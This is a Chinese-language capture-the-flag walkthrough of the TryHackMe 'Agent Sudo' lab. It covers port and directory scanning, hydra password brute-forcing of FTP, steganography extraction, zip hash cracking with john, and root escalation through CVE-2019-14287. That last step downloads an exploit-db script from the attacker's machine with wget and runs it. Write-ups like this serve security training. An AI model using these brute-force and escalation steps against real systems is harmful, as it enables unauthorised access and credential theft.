1. UA头代理的修改
2. ftp ssh的爆破
3. 图片隐写 binwalk steghide工具的使用
4. zip文件转hash john破解密码
5. sudo CVE-2019–14287提权
信息搜集
端口扫描——>目录扫描——>site功能点探测——>漏洞利用端口扫描
nmap 10.10.170.124 -T5Starting Nmap 7.94 ( https://nmap.org ) at 2024-03-27 19:09 CSTWarning: 10.10.170.124 giving up on port because retransmission cap hit (2).Nmap scan report for 10.10.170.124Host is up (0.37s latency).Not shown: 997 closed tcp ports (reset)PORT STATE SERVICEopen ftpopen sshopen httpNmap done: 1 IP address (1 host up) scanned in 6.39 secondsnmap 10.10.170.124 -T5 -p 21,22,80 -AStarting Nmap 7.94 ( https://nmap.org ) at 2024-03-27 19:09 CSTStats: 0:00:27 elapsed; 0 hosts completed (1 up), 1 undergoing Script ScanNSE Timing: About 98.58% done; ETC: 19:10 (0:00:00 remaining)Nmap scan report for 10.10.170.124Host is up (0.25s latency).PORT STATE SERVICE VERSIONopen ftp vsftpd 3.0.3open ssh OpenSSH 7.6p1 Ubuntu 4ubuntu0.3 (Ubuntu Linux; protocol 2.0)ssh-hostkey:2048 ef:1f:5d:04:d4:77:95:06:60:72:ec:f0:58:f2:cc:07 (RSA)256 5e:02:d1:9a:c4:e7:43:06:62:c1:9e:25:84:8a:e7:ea (ECDSA)256 2d:00:5c:b9:fd:a8:c8:d8:80:e3:92:4f:8b:4f:18:e2 (ED25519)open http Apache httpd 2.4.29 ((Ubuntu)): Apache/2.4.29 (Ubuntu): AnnoucementWarning: OSScan results may be unreliable because we could not find at least 1 open and 1 closed portAggressive OS guesses: Linux 3.10 - 3.13 (95%), ASUS RT-N56U WAP (Linux 3.4) (95%), Linux 3.1 (95%), Linux 3.16 (95%), Linux 3.2 (95%), AXIS 210A or 211 Network Camera (Linux 2.6.17) (94%Sony X75CH-series Android TV (Android 5.0) (92%), Linux 2.6.32 (92%), Linux 3.11 (92%), Linux 3.18 (92%)No exact OS matches for host (test conditions non-ideal).Network Distance: 4 hopsService Info: OSs: Unix, Linux; CPE: cpe:/o:linux:linux_kernelTRACEROUTE (using port 22/tcp)HOP RTT ADDRESS1 231.78 ms 10.2.0.12 ... 34 357.67 ms 10.10.170.124OS and Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .Nmap done: 1 IP address (1 host up) scanned in 36.95 seconds
目录扫描
└─# dirsearch -u 10.10.170.124 -x 403_|. _ _ _ _ _ _|_ v0.4.2(_||| _) (/_(_|| (_| )Extensions: php, aspx, jsp, html, js | HTTP method: GET | Threads: 30 | Wordlist size: 10927Output File: /root/.dirsearch/reports/10.10.170.124_24-03-27_19-08-48.txtError Log: /root/.dirsearch/logs/errors-24-03-27_19-08-48.logTarget: http://10.10.170.124/[19:08:49] Starting:[19:10:40] 200 - 218B - /index.php[19:10:40] 200 - 218B - /index.php/login/Task Completed
#03
web信息搜集
修改代理为C
得到chris 疑似用户名
漏洞利用
hydra爆破
└─# hydra -l "chris" -P /usr/share/wordlists/rockyou.txt 10.10.170.124 ftpHydra v9.5 (c) 2023 by van Hauser/THC & David Maciejak - Please do not use in military or secret service organizations, or for illegal purposes (this is non-binding, these *** ignore lawsand ethics anyway).Hydra (https://github.com/vanhauser-thc/thc-hydra) starting at 2024-03-27 19:33:05[WARNING] Restorefile (you have 10 seconds to abort... (use option -I to skip waiting)) from a previous session found, to prevent overwriting, ./hydra.restore[DATA] max 16 tasks per 1 server, overall 16 tasks, 14344399 login tries (l:1/p:14344399), ~896525 tries per task[DATA] attacking ftp://10.10.170.124:21/[STATUS] 251.00 tries/min, 251 tries in 00:01h, 14344148 to do in 952:29h, 16 active[21][ftp] host: 10.10.170.124 login: chris password: crystal1 of 1 target successfully completed, 1 valid password foundHydra (https://github.com/vanhauser-thc/thc-hydra) finished at 2024-03-27 19:34:20
得到ftp账密
登录ftp
ftp 10.10.170.124下载文件
ftp> ls229 Entering Extended Passive Mode (|||54088|)150 Here comes the directory listing.-rw-r--r-- 1 0 0 217 Oct 29 2019 To_agentJ.txt-rw-r--r-- 1 0 0 33143 Oct 29 2019 cute-alien.jpg-rw-r--r-- 1 0 0 34842 Oct 29 2019 cutie.png226 Directory send OK.ftp> mget To_agentJ.txt cute-alien.jpg cutie.pngmget To_agentJ.txt [anpqy?]?229 Entering Extended Passive Mode (|||41202|)150 Opening BINARY mode data connection for To_agentJ.txt (217 bytes).100% |**********************************************************************************************************************************************| 217 45.53 KiB/s 00:00 ETA226 Transfer complete.217 bytes received in 00:00 (0.62 KiB/s)mget cute-alien.jpg [anpqy?]?229 Entering Extended Passive Mode (|||18671|)150 Opening BINARY mode data connection for cute-alien.jpg (33143 bytes).100% |**********************************************************************************************************************************************| 33143 45.50 KiB/s 00:00 ETA226 Transfer complete.33143 bytes received in 00:01 (30.56 KiB/s)mget cutie.png [anpqy?]?229 Entering Extended Passive Mode (|||55127|)150 Opening BINARY mode data connection for cutie.png (34842 bytes).100% |**********************************************************************************************************************************************| 34842 47.25 KiB/s 00:00 ETA226 Transfer complete.34842 bytes received in 00:01 (31.95 KiB/s)└─# cat To_agentJ.txtDear agent J,All these alien like photos are fake! Agent R stored the real picture inside your directory. Your login password is somehow stored in the fake picture. It shouldn't be a problem for you.From,Agent C
提示信息存贮在图片中 猜测图片隐写类
图片隐写
binwalk -e cutie.png --run-as=root得到一个zip文件 有加密
转换为hash 使用john破解密码
└─# zip2john 8702.zip8702.zip/To_agentR.txt:$zip2$*0*1*0*4673cae714579045*67aa*4e*61c4cf3af94e649f827e5964ce575c5f7a239c48fb992c8ea8cbffe51d03755e0ca861a5a3dcbabfa618784b85075f0ef476c6da8261805bd0a4309db38835ad32613e3dc5d7e87c0f91c0b5e64e*4969f382486cb6767ae6*$/zip2$:To_agentR.txt:8702.zip:8702.zip┌──(root㉿kali)-[~/桌面/_cutie.png.extracted]└─# zip2john 8702.zip > zip┌──(root㉿kali)-[~/桌面/_cutie.png.extracted]└─# john --wordlist=/usr/share/wordlists/rockyou.txt zipUsing default input encoding: UTF-8Loaded 1 password hash (ZIP, WinZip [PBKDF2-SHA1 256/256 AVX2 8x])Cost 1 (HMAC size) is 78 for all loaded hashesWill run 8 OpenMP threadsPress 'q' or Ctrl-C to abort, almost any other key for statusalien (8702.zip/To_agentR.txt)1g 0:00:00:00 DONE (2024-03-27 19:46) 5.263g/s 172463p/s 172463c/s 172463C/s christal..eatme1Use the "--show" option to display all of the cracked passwords reliablySession completed.
得到一串字符 疑似加密 尝试解密
是base64加密 结果为Area51
猜测为用户名 爆破ssh 发现无法爆破
更换思路 最开始给了两张图片 另外一张图片还没有用 猜测可以另外一张图片也存在隐写 这个是密码
└─the file "message.txt" does already exist. overwrite ? (y/n) ywrote extracted data to "message.txt".
果然发现存在隐写文件
james hackerrules!
账户密码
james@agent-sudo:~$ sudo -l[sudo] password for james:Sorry, try again.[sudo] password for james:Matching Defaults entries for james on agent-sudo:env_reset, mail_badpass,secure_path=/usr/local/sbin:/usr/local/bin:/usr/sbin:/usr/bin:/sbin:/bin:/snap/binUser james may run the following commands on agent-sudo:(ALL, !root) /bin/bash
提权
sudo -l发现
root@agent-sudo:~# sudo -lMatching Defaults entries for root on agent-sudo:env_reset, mail_badpass,secure_path=/usr/local/sbin:/usr/local/bin:/usr/sbin:/usr/bin:/sbin:/bin:/snap/binUser root may run the following commands on agent-sudo:(ALL : ALL) ALL
搜索到CVE-2019–14287
https://www.exploit-db.com/exploits/47502
上传脚本 提权
james@agent-sudo:~$ wget http://10.2.11.235:8888/47502.py--2024-03-27 12:15:03-- http://10.2.11.235:8888/47502.pyConnecting to 10.2.11.235:8888... connected.HTTP request sent, awaiting response... 200 OKLength: 1663 (1.6K) [text/x-python]Saving to: ‘47502.py’47502.py 100%[===================================>] 1.62K --.-KB/s in 0s2024-03-27 12:15:04 (163 MB/s) - ‘47502.py’ saved [1663/1663]james@agent-sudo:~$ ls47502.py Alien_autospy.jpg user_flag.txtjames@agent-sudo:~$ python3 47502.pyEnter current username :jamesLets hope it worksroot@agent-sudo:~# iduid=0(root) gid=1000(james) groups=1000(james)root@agent-sudo:~#root@agent-sudo:/root# cat root.txtTo Mr.hacker,Congratulation on rooting this box. This box was designed for TryHackMe. Tips, always update your machine.Your flag isb53a02f55b57d4439e3341834d70c062By,DesKel a.k.a Agent R
原文始发于微信公众号(ZeroPointZero安全团队):THM靶机学习-agent sudo
免责声明:文章中涉及的程序(方法)可能带有攻击性,仅供安全研究与教学之用,读者将其信息做其他用途,由读者承担全部法律及连带责任,本站不承担任何法律及连带责任;如有问题可邮件联系(建议使用企业邮箱或有效邮箱,避免邮件被拦截,联系方式见首页),望知悉。
- 左青龙
- 微信扫一扫
-
- 右白虎
- 微信扫一扫
-
评论